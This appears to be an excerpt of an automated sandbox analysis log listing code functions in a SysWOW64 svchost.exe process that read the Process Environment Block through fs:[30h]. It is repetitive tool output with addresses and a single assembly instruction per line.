            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C156 mov eax, dword ptr fs:[00000030h]1_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C8158 mov eax, dword ptr fs:[00000030h]1_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536154 mov eax, dword ptr fs:[00000030h]1_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536154 mov eax, dword ptr fs:[00000030h]1_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C4144 mov ecx, dword ptr fs:[00000030h]1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA118 mov ecx, dword ptr fs:[00000030h]1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F0115 mov eax, dword ptr fs:[00000030h]1_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560124 mov eax, dword ptr fs:[00000030h]1_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036061E5 mov eax, dword ptr fs:[00000030h]1_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]1_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]1_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035601F8 mov eax, dword ptr fs:[00000030h]1_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03570185 mov eax, dword ptr fs:[00000030h]1_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]1_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]1_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]1_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]1_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532050 mov eax, dword ptr fs:[00000030h]1_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6050 mov eax, dword ptr fs:[00000030h]1_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355C073 mov eax, dword ptr fs:[00000030h]1_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4000 mov ecx, dword ptr fs:[00000030h]1_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6030 mov eax, dword ptr fs:[00000030h]1_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A020 mov eax, dword ptr fs:[00000030h]1_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C020 mov eax, dword ptr fs:[00000030h]1_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B20DE mov eax, dword ptr fs:[00000030h]1_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C0F0 mov eax, dword ptr fs:[00000030h]1_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035720F0 mov ecx, dword ptr fs:[00000030h]1_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035380E9 mov eax, dword ptr fs:[00000030h]1_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B60E0 mov eax, dword ptr fs:[00000030h]1_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353208A mov eax, dword ptr fs:[00000030h]1_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F60B8 mov eax, dword ptr fs:[00000030h]1_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F60B8 mov ecx, dword ptr fs:[00000030h]1_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C80A8 mov eax, dword ptr fs:[00000030h]1_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530750 mov eax, dword ptr fs:[00000030h]1_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE75D mov eax, dword ptr fs:[00000030h]1_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]1_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]1_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4755 mov eax, dword ptr fs:[00000030h]1_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov esi, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538770 mov eax, dword ptr fs:[00000030h]1_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530710 mov eax, dword ptr fs:[00000030h]1_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560710 mov eax, dword ptr fs:[00000030h]1_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C700 mov eax, dword ptr fs:[00000030h]1_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov ecx, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AC730 mov eax, dword ptr fs:[00000030h]1_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]1_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]1_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353C7C0 mov eax, dword ptr fs:[00000030h]1_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B07C3 mov eax, dword ptr fs:[00000030h]1_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]1_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]1_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE7E1 mov eax, dword ptr fs:[00000030h]1_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D678E mov eax, dword ptr fs:[00000030h]1_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035307AF mov eax, dword ptr fs:[00000030h]1_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E47A0 mov eax, dword ptr fs:[00000030h]1_2_035E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354C640 mov eax, dword ptr fs:[00000030h]1_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03562674 mov eax, dword ptr fs:[00000030h]1_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]1_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]1_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572619 mov eax, dword ptr fs:[00000030h]1_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE609 mov eax, dword ptr fs:[00000030h]1_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E627 mov eax, dword ptr fs:[00000030h]1_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03566620 mov eax, dword ptr fs:[00000030h]1_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568620 mov eax, dword ptr fs:[00000030h]1_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353262C mov eax, dword ptr fs:[00000030h]1_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov eax, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035666B0 mov eax, dword ptr fs:[00000030h]1_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C6A6 mov eax, dword ptr fs:[00000030h]1_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6500 mov eax, dword ptr fs:[00000030h]1_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035365D0 mov eax, dword ptr fs:[00000030h]1_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A5D0 mov eax, dword ptr fs:[00000030h]1_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E5CF mov eax, dword ptr fs:[00000030h]1_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E5E7 mov eax, dword ptr fs:[00000030h]1_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035325E0 mov eax, dword ptr fs:[00000030h]1_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C5ED mov eax, dword ptr fs:[00000030h]1_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E59C mov eax, dword ptr fs:[00000030h]1_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov eax, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532582 mov ecx, dword ptr fs:[00000030h]1_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03564588 mov eax, dword ptr fs:[00000030h]1_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035545B1 mov eax, dword ptr fs:[00000030h]1_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B05A7 mov eax, dword ptr fs:[00000030h]1_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA456 mov eax, dword ptr fs:[00000030h]1_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352645D mov eax, dword ptr fs:[00000030h]1_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355245A mov eax, dword ptr fs:[00000030h]1_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356E443 mov eax, dword ptr fs:[00000030h]1_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355A470 mov eax, dword ptr fs:[00000030h]1_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BC460 mov ecx, dword ptr fs:[00000030h]1_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568402 mov eax, dword ptr fs:[00000030h]1_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E420 mov eax, dword ptr fs:[00000030h]1_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C427 mov eax, dword ptr fs:[00000030h]1_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6420 mov eax, dword ptr fs:[00000030h]1_2_035B6420
